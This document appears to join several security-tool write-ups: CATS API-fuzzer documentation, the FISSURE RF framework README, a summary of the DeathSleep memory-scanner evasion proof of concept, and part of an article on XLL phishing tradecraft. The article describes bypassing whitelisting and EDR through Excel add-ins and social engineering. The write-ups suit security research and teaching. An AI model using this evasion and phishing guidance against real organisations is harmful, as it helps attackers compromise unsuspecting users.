  • provide structural constraints for (ideally) all request/response properties (min, max, regex)
  • have some sort of CorrelationIds/TraceIds within headers
  • have at least one security scheme in place
  • avoid having the API version part of the paths
  • document response codes for both "happy" and "unhappy" flows
  • avoid using xml payload unless there is a really good reason (like documenting an old API for example)
  • json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS currently has 9 registered ContractInfo Fuzzers:

  • HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
  • NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
  • PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
  • RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
  • RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
  • SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemes for all paths, either globally configured or per path
  • TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
  • VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
  • XmlContentTypeContractInfoFuzzer - verifies that requests and responses for all OpenAPI contract paths do not offer application/xml as a Content-Type

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS' super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so-called FunctionalFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions and assertions, as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payloads, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: value
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

  • you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
  • you can have multiple tests under the same path: test1, test2, etc.
  • expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
  • at most one of the properties can have multiple values. When this happens, that test will actually expand into a list of tests, one for each of the values supplied. In the example above prop7 has 3 values, which will result in 3 tests, one for each value.
  • tests within the file are executed in the declared order. This is why outputs from one test can act as inputs for the next one(s) (see the next section for details).
  • if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
  • if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
  • if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
  • if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, then a custom test will be created for each type of payload
  • the file uses JsonPath syntax for all the properties you can supply; you can separate elements with # instead of . as in the example above

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATS mostly relies on generated data, with a small amount of help from reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name and its fully qualified name from the response in order to set its value. You can then refer to the variable using ${variable_name} from another test in order to use its value.

Here is an example:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200

Suppose the test_1 execution outputs:

{
  "pet": {
    "id": 2
  }
}

When executing test_1, the value of the pet id will be stored in the petId variable (value 2). When executing test_2, the id parameter will be replaced with the value of the petId variable (2) from the previous test.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "Baby"
      pet#id: "[0-9]+"
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200

Considering the above file:

  • the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
  • if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
  "pet": {
    "id": 2,
    "name": "Baby"
  }
}

But this one won't (pet#name is missing):

{
  "pet": {
    "id": 2
  }
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "${request#name}"
      pet#id: "[0-9]+"

It will verify that the response contains a pet#name element and that its value equals My Pet, as sent in the request.

Some notes:

  • verify parameters support Java regexes as values
  • you can supply more than one parameter to check (as seen above)
  • if at least one of the parameters is not present in the response, CATS will report an error
  • if all parameters are found and have valid values, but the response code is not matched, CATS will report a warning
  • if all the parameters are found and match their values, and the response code is as expected, CATS will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATS is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verifying responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes element and a stringsFile element. A typical securityFuzzerFile will look like this:

/pet:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses JsonPath syntax for all the properties you can supply; you can separate elements with # instead of . as in the example.

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

  • it will add the fixed value "My Pet" to all the requests for the field name
  • for each field specified in targetFields, i.e. pet#id and pet#description, it will create requests for each line from the xss.txt file and supply those values in each field
  • if you consider the xss.txt sample file included in the CATS repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description, i.e. a total of 42 tests
  • for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATS will report the test as an error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFields:
      - pet#id
      - pet#description
    stringsFile: xss.txt

Instead of specifying the field names, you can broaden the scope to target certain field types. For example, if you want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
  test_1:
    description: Run XSS scenarios
    name: "My Pet"
    expectedResponseCode: 200
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, an xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile that includes the fields you think are meaningful for these types of tests. (It was a deliberate choice, for now, not to include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, so it might be perfectly valid to expect a 200; or it might validate the fields directly, so it might be perfectly valid to expect a 400. A 500 will usually mean something was not handled properly and might signal a possible bug.
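As a sketch of that idea (paths, field names, strings files and expected codes are all illustrative), a securityFuzzerFile with one test entry per nasty-strings file might look like:

/users:
  sql_injection_test:
    description: Run SQL injection scenarios
    expectedResponseCode: 400
    httpMethod: all
    targetFields:
      - user#name
    stringsFile: sql_injection.txt
  xss_test:
    description: Run XSS scenarios
    expectedResponseCode: 200
    httpMethod: all
    targetFieldTypes:
      - string
    stringsFile: xss.txt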

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the securityFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl):

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

  • send a POST request to http://service-url
  • use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
  • replace one by one field1,field2,header with fuzz data and send each request to the service endpoint
  • ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

  • null values
  • empty values
  • zalgo text
  • abugidas characters
  • large random unicode data
  • very large strings (80k characters)
  • single and multi code point emojis
  • unicode control characters
  • unicode separators
  • unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" "http://service-url/paths1?query1=test&query2"

Reference Data File

There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
  prop#subprop: 12
  prop2: 33
  prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
  prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "cool street"
  },
  "name": "Joe"
}

and the following reference data file:

/path/0.1/auth:
  address#street: "My Street"
  name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John"
}

The file uses JsonPath syntax for all the properties you can supply; you can separate elements with # instead of . as in the example above.

You can use environment (system) variables in a ref data file using $$VARIABLE_NAME (notice the double $$).
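For example (the variable and field names are illustrative), assuming an AUTH_CODE environment variable is exported before CATS runs:

/path/0.1/auth:
  authCode: $$AUTH_CODE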

Setting additionalProperties

As additional properties are maps, i.e. they don't actually have a structure, CATS cannot currently generate valid values for them. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
  address#street: "My Street"
  name: "John"
  additionalProperties:
    topElement: metadata
    mapValues:
      test: "value1"
      anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
  "address": {
    "phone": "123",
    "postCode": "408",
    "street": "My Street"
  },
  "name": "John",
  "metadata": {
    "test": "value1",
    "anotherTest": "value2"
  }
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all as a key in the refData file:

all:
  address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI cannot describe request fields that depend on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using cats_remove_field as the value for the fields you want to remove. For the above case the refData file will look as follows:

all:
  name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files which don't require manually setting the reference data values. The --refData file must be created with variables like ${variable} instead of fixed values, and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variable names with their values, you must supply the --refData file as an argument when the FunctionalFuzzer runs.

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080 --refData=refData.yml

The functionalFuzzer.yml file:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id

The refData.yml file:

/pet-type:
  id: ${petId}

After running CATS using the command and the 2 files above, you will get a refData_replaced.yml file where the id will get the value returned in the petId variable.

The refData_replaced.yml:

/pet-type:
  id: 123

You can now use the refData_replaced.yml as a --refData file for running CATS with the rest of the Fuzzers.

Headers File

This can be used to send custom fixed headers with each payload. It is useful when you have authentication tokens you want to use to authenticate the API calls. You can use path specific headers or common headers that will be added to each call using an all element. Specific paths will take precedence over the all element. Sample headers file:

all:
  Accept: application/json
/path/0.1/auth:
  jwt: XXXXXXXXXXXXX
/path/0.2/cancel:
  jwt: YYYYYYYYYYYYY

This will add the Accept header to all calls and the jwt header to the specified paths. You can use environment (system) variables in a headers file using $$VARIABLE_NAME (notice the double $$).

DELETE requests

DELETE is the only HTTP verb intended to remove resources, and executing the same DELETE request twice will cause the second one to fail as the resource is no longer available. It would be quite cumbersome to supply a large list of identifiers within the --refData file, which is why the recommendation used to be to skip the DELETE method when running CATS.

But starting with version 7.0.2, CATS has some intelligence for dealing with DELETE. In order to have enough valid entities, CATS will save the corresponding POST requests in an internal queue, and every time a DELETE request is executed it will poll data from there. For this to actually work, your contract must comply with common-sense conventions:

  • the DELETE path is actually the POST path plus an identifier: if POST is /pets, then DELETE is expected to be /pets/{petId}.
  • CATS will try to match the {petId} parameter within the body returned by the POST request, trying various combinations of the petId name. It will search for the following entries: petId, id, pet-id and pet_id, with different cases.
  • If any of those entries is found within a stored POST result, it will replace the {petId} with that value

For example, suppose that a POST to /pets responds with:

{
  "pet_id": 2,
  "name": "Chuck"
}

When doing a DELETE request, CATS will discover that {petId} and pet_id are used as identifiers for the Pet resource, and will do the DELETE at /pets/2.

If these conventions are followed (which also align with good REST naming practices), it is expected that DELETE and POST requests will be on par for most of the entities.

Content Negotiation

Some APIs might use content negotiation versioning which implies formats like application/v11+json in the Accept header.

You can handle this in CATS as follows:

  • if the OpenAPI contract defines its content as:
requestBody:
  required: true
  content:
    application/v5+json:
      schema:
        $ref: '#/components/RequestV5'
    application/v6+json:
      schema:
        $ref: '#/components/RequestV6'

by having clear separation between versions, you can pass the --contentType argument with the version you want to test: cats ... --contentType="application/v6+json".

If the OpenAPI contract is not version aware (you already exported it specific to a version) and the content looks like:

requestBody:
  required: true
  content:
    application/json:
      schema:
        $ref: '#/components/RequestV5'

and you still need to pass the application/v5+json Accept header, you can use the --headers file to add it:

all:
  Accept: "application/v5+json"

Edge Spaces Strategy

There isn't a consensus on how services should handle values that are trailed or prefixed with spaces. One strategy is to have the service trim the spaces before doing the validation, while other services will just validate the values as they are. You can control how CATS should expect such cases to be handled by the service using the --edgeSpacesStrategy argument. You can set this to trimAndValidate or validateAndTrim depending on how you expect the service to behave:

  • trimAndValidate means that the service will first trim the spaces and after that run the validation
  • validateAndTrim means that the service runs the validation first without any trimming of spaces

This is a global setting, i.e. configured when CATS starts, and all Fuzzers expect consistent behaviour from all the service endpoints.
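For instance (contract and server are placeholders), if you expect the endpoints to validate values exactly as received:

> cats --contract=my.yml --server=http://localhost:8080 --edgeSpacesStrategy=validateAndTrim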

URL Parameters

There are cases when certain parts of the request URL are parameterized. For example, a case like /{version}/pets, where {version} is supposed to have the same value for all requests. This is why you can supply actual values to replace such parameters using the --urlParams argument. You can supply a ;-separated list of name:value pairs to replace the named parameters with their corresponding values. For example, supplying --urlParams=version:v1.0 will replace the version parameter from the above example with the value v1.0.

Dealing with AnyOf, AllOf and OneOf

CATS also supports schemas with oneOf, allOf and anyOf composition. CATS will consider all possible combinations when creating the fuzzed payloads.

Dynamic values in configuration files

The following configuration files: securityFuzzerFile, functionalFuzzerFile and refData support setting dynamic values for their inner fields. For now, support only exists for java.time.* and org.apache.commons.lang3.*, but more types of elements will come in the near future.

Let's suppose you have a date/date-time field and you want to set it to 10 days from now. You can do this by setting its value to T(java.time.OffsetDateTime).now().plusDays(10). This will return an ISO-compliant date-time in UTC format.

A functionalFuzzer using this can look like:

/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: "T(java.time.OffsetDateTime).now().plusDays(10)"
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD

You can also check the responses using a similar syntax, also accounting for the actual values returned in the response. This is a syntax that can test if a returned date is after the current date: T(java.time.LocalDate).now().isBefore(T(java.time.LocalDate).parse(expiry.toString())). It will check if the expiry field returned in the JSON response, parsed as a date, is after the current date.

The syntax of dynamically setting dates is compliant with the Spring Expression Language specs.
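Since org.apache.commons.lang3.* is also supported, the same mechanism can fill a field with a random value at runtime. A minimal sketch (the path, property name and expected code are illustrative):

/path:
  test_1:
    description: Use a random alphanumeric code
    code: "T(org.apache.commons.lang3.RandomStringUtils).randomAlphanumeric(10)"
    expectedResponseCode: 200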

Running behind proxy

If you need to run CATS behind a proxy, you can supply the following arguments: --proxyHost and --proxyPort. A typical run with proxy settings on localhost:8080 will look as follows:

> cats --contract=YAML_FILE --server=SERVER_URL --proxyHost=localhost --proxyPort=8080

Dealing with Authentication

HTTP header(s) based authentication

CATS supports any form of HTTP header(s)-based authentication (basic auth, OAuth, custom JWT, apiKey, etc.) using the headers mechanism. You can supply the specific HTTP header name and value and apply it to all endpoints. Additionally, basic auth is also supported using the --basicauth=USR:PWD argument.
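For example (the header and variable names are illustrative), a headers file that sends an Authorization header with every request, reading its full value from an environment variable via the $$ mechanism described earlier:

all:
  Authorization: $$AUTH_HEADER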

One-Way or Two-Way SSL

By default, CATS trusts all server certificates and doesn't perform hostname verification.

For two-way SSL you can specify a JKS file (Java Keystore) that holds the client's private key using the following arguments:

  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key within the sslKeystore

For details on how to load the certificate and private key into a Java Keystore you can use this guide: https://mrkandreev.name/blog/java-two-way-ssl/.
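Putting the SSL arguments together, a two-way SSL run might look like this (file name, passwords, contract and server are placeholders):

> cats --contract=my.yml --server=https://localhost:8443 --sslKeystore=keystore.jks --sslKeystorePwd=changeit --sslKeyPwd=changeit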

Limitations

Native Binaries

When using the native binaries (not the uberjar) there might be issues when using dynamic values in the CATS files. This is due to the fact that GraalVM only bundles whatever it can discover at compile time. The following classes are currently supported:

java.util.Base64.Encoder.class, java.util.Base64.Decoder.class, java.util.Base64.class, org.apache.commons.lang3.RandomUtils.class, org.apache.commons.lang3.RandomStringUtils.class, 
org.apache.commons.lang3.DateFormatUtils.class, org.apache.commons.lang3.DateUtils.class,
org.apache.commons.lang3.DurationUtils.class, java.time.LocalDate.class, java.time.LocalDateTime.class, java.time.OffsetDateTime.class

API specs

At this moment, CATS only works with OpenAPI specs and has limited functionality using template payloads through the cats fuzz ... subcommand.

Media types and HTTP methods

The Fuzzers have the following support for media types and HTTP methods:

  • application/json and application/x-www-form-urlencoded media types only
  • HTTP methods: POST, PUT, PATCH, GET and DELETE

Additional Parameters

If a response contains a free Map specified using the additionalParameters tag, CATS will issue a WARN level log message, as it won't be able to validate that the response matches the schema.

Regexes within 'pattern'

CATS uses RgxGen in order to generate Strings based on regexes. This has certain limitations mostly with complex patterns.

Custom Files General Info

All custom files that can be used by CATS (functionalFuzzerFile, headers, refData, etc) are in YAML format. When setting or getting values to/from JSON for input and/or output variables, you must use JsonPath syntax with either # or . as separators. You can find some selector examples here: JsonPath.
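For instance (the field names are illustrative), the following two selectors point at the same nested field and can be used interchangeably in these files:

pet#owner#name
pet.owner.name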

Contributing

Please refer to CONTRIBUTING.md.



FISSURE - Frequency Independent SDR-based Signal Understanding and Reverse Engineering


Frequency Independent SDR-based Signal Understanding and Reverse Engineering

FISSURE is an open-source RF and reverse engineering framework designed for all skill levels with hooks for signal detection and classification, protocol discovery, attack execution, IQ manipulation, vulnerability analysis, automation, and AI/ML. The framework was built to promote the rapid integration of software modules, radios, protocols, signal data, scripts, flow graphs, reference material, and third-party tools. FISSURE is a workflow enabler that keeps software in one location and allows teams to effortlessly get up to speed while sharing the same proven baseline configuration for specific Linux distributions.

The framework and tools included with FISSURE are designed to detect the presence of RF energy, understand the characteristics of a signal, collect and analyze samples, develop transmit and/or injection techniques, and craft custom payloads or messages. FISSURE contains a growing library of protocol and signal information to assist in identification, packet crafting, and fuzzing. Online archive capabilities exist to download signal files and build playlists to simulate traffic and test systems.

The friendly Python codebase and user interface allows beginners to quickly learn about popular tools and techniques involving RF and reverse engineering. Educators in cybersecurity and engineering can take advantage of the built-in material or utilize the framework to demonstrate their own real-world applications. Developers and researchers can use FISSURE for their daily tasks or to expose their cutting-edge solutions to a wider audience. As awareness and usage of FISSURE grows in the community, so will the extent of its capabilities and the breadth of the technology it encompasses.


Getting Started

Supported

There are two branches within FISSURE to make file navigation easier and reduce code redundancy. The Python2_maint-3.7 branch contains a codebase built around Python2, PyQt4, and GNU Radio 3.7, while the Python3_maint-3.8 branch is built around Python3, PyQt5, and GNU Radio 3.8.

Operating System       FISSURE Branch
Ubuntu 18.04 (x64)     Python2_maint-3.7
Ubuntu 18.04.5 (x64)   Python2_maint-3.7
Ubuntu 18.04.6 (x64)   Python2_maint-3.7
Ubuntu 20.04.1 (x64)   Python3_maint-3.8
Ubuntu 20.04.4 (x64)   Python3_maint-3.8

In-Progress (beta)

Operating System       FISSURE Branch
Ubuntu 22.04 (x64)     Python3_maint-3.8

Note: Certain software tools do not work for every OS. Refer to Software And Conflicts for details.

Installation

git clone https://github.com/ainfosec/fissure.git
cd FISSURE
git checkout Python2_maint-3.7   # or: git checkout Python3_maint-3.8
./install

This will automatically install PyQt software dependencies required to launch the installation GUIs if they are not found.

Next, select the option that best matches your operating system (it should be detected automatically if your OS matches an option).


Python2_maint-3.7 Python3_maint-3.8

It is recommended to install FISSURE on a clean operating system to avoid existing conflicts. Select all the recommended checkboxes (Default button) to avoid errors while operating the various tools within FISSURE. There will be multiple prompts throughout the installation, mostly asking for elevated permissions and user names. If an item contains a "Verify" section at the end, the installer will run the command that follows and highlight the checkbox item green or red depending on if any errors are produced by the command. Checked items without a "Verify" section will remain black following the installation.


Usage

fissure

Refer to the FISSURE Help menu for more details on usage.

Details

Components

  • Dashboard
  • Central Hub (HIPRFISR)
  • Target Signal Identification (TSI)
  • Protocol Discovery (PD)
  • Flow Graph & Script Executor (FGE)


Capabilities

Signal Detector



IQ Manipulation


Signal Lookup


Pattern Recognition


Attacks


Fuzzing


Signal Playlists


Image Gallery


Packet Crafting


Scapy Integration


CRC Calculator


Logging


Lessons

FISSURE comes with several helpful guides to become familiar with different technologies and techniques. Many include steps for using various tools that are integrated into FISSURE.

  • Lesson1: OpenBTS
  • Lesson2: Lua Dissectors
  • Lesson3: Sound eXchange
  • Lesson4: ESP Boards
  • Lesson5: Radiosonde Tracking
  • Lesson6: RFID
  • Lesson7: Data Types
  • Lesson8: Custom GNU Radio Blocks
  • Lesson9: TPMS
  • Lesson10: Ham Radio Exams
  • Lesson11: Wi-Fi Tools

Roadmap

  • Add more hardware types, RF protocols, signal parameters, analysis tools
  • Support more operating systems
  • Create a signal conditioner, feature extractor, and signal classifier with selectable AI/ML techniques
  • Develop class material around FISSURE (RF Attacks, Wi-Fi, GNU Radio, PyQt, etc.)
  • Transition the main FISSURE components to a generic sensor node deployment scheme

Contributing

Suggestions for improving FISSURE are strongly encouraged. Leave a comment in the Discussions page if you have any thoughts regarding the following:

  • New feature suggestions and design changes
  • Software tools with installation steps
  • New lessons or additional material for existing lessons
  • RF protocols of interest
  • More hardware and SDR types for integration
  • IQ analysis scripts in Python
  • Installation corrections and improvements

Contributions to improve FISSURE are crucial to expediting its development. Any contributions you make are greatly appreciated. If you wish to contribute through code development, please fork the repo and create a pull request:

  1. Fork the project
  2. Create your feature branch (git checkout -b feature/AmazingFeature)
  3. Commit your changes (git commit -m 'Add some AmazingFeature')
  4. Push to the branch (git push origin feature/AmazingFeature)
  5. Open a pull request

Creating Issues to bring attention to bugs is also welcomed.

Collaborating

Contact Assured Information Security, Inc. (AIS) Business Development to propose and formalize any FISSURE collaboration opportunities, whether that is through dedicating time towards integrating your software, having the talented people at AIS develop solutions for your technical challenges, or integrating FISSURE into other platforms/applications.

License

GPL-3.0

For license details, see LICENSE file.

Contact

Follow on Twitter: @FissureRF, @AinfoSec

Chris Poore - Assured Information Security, Inc. - poorec@ainfosec.com

Business Development - Assured Information Security, Inc. - bd@ainfosec.com

Acknowledgments

Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions to this project.



DeathSleep - A PoC Implementation For An Evasion Technique To Terminate The Current Thread And Restore It Before Resuming Execution, While Implementing Page Protection Changes During No Execution


A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.


Intro

Sleep and obfuscation methods are well known in the maldev community. Though implementations differ, they share the objective of hiding from memory scanners while sleeping, usually by changing page protections and sometimes adding cool features like encrypting the shellcode. But besides the shellcode there is another important thing to hide: the current execution thread. Spoofing the stack is cool, but after thinking a little about it I realized there is no need to spoof the stack… if there is no stack :)

The usability of this technique is left to the reader to assess, but in any case, I think it is a cool way to review some topics and learn some maldev for those who, like me, are starting out in this world.

The main implementation shown here keeps everything that we need off the stack by holding it in the data section as global variables, but an implementation moving everything to the heap will be published soon. That version aims to show some key modifications that need to be made to make this code position independent (PIC) and injectable.

This repository is mirrored between GitHub and GitLab.



XLL_Phishing - XLL Phishing Tradecraft


With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have begun aggressively exploring other options to achieve user-driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing-for-access method:

  1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful.
  2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed?
  3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc?
  4. Defenses - Is application whitelisting enforced?
  5. Detection - What kind of AV/EDR is the client running?

These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.

This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.

Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.


What are XLL's?

XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal Excel documents.


XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, software that is very commonly encountered in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass application whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C#, which provides a great deal more flexibility and power (and sanity) than VBA macros, which further makes them a desirable choice.

The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box for organizations to check to block the download of that file extension through both email and web download. Sadly, many organizations are years behind the curve, and as such XLL's stand to be a viable method of phishing for some time.

There is a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen in the Excel XLL SDK documentation.
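For orientation, here is a minimal, benign sketch in C of what an XLL entry point looks like (an illustration only, not the payload from this research; a real build would pull in the Excel SDK headers):

#include <windows.h>

// Excel calls xlAutoOpen when the add-in is loaded; returning 1 signals success.
__declspec(dllexport) int WINAPI xlAutoOpen(void)
{
    // A real payload would run here; this placeholder only proves code execution.
    MessageBoxA(NULL, "xlAutoOpen reached", "XLL PoC", MB_OK);
    return 1;
}

Compile it as a DLL and rename the output to .xll so that Excel will load it on double click.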


Upon double clicking an XLL, the user is greeted by this screen:


This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.

Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.

There is a pretty clean break in Office versions that can be used as a rule of thumb:

Office 2016 or earlier: x86

Office 2019 or later: x64

It should be noted that it is possible to install the other architecture for each product; however, these are the default architectures installed, and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course, depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.

Resources

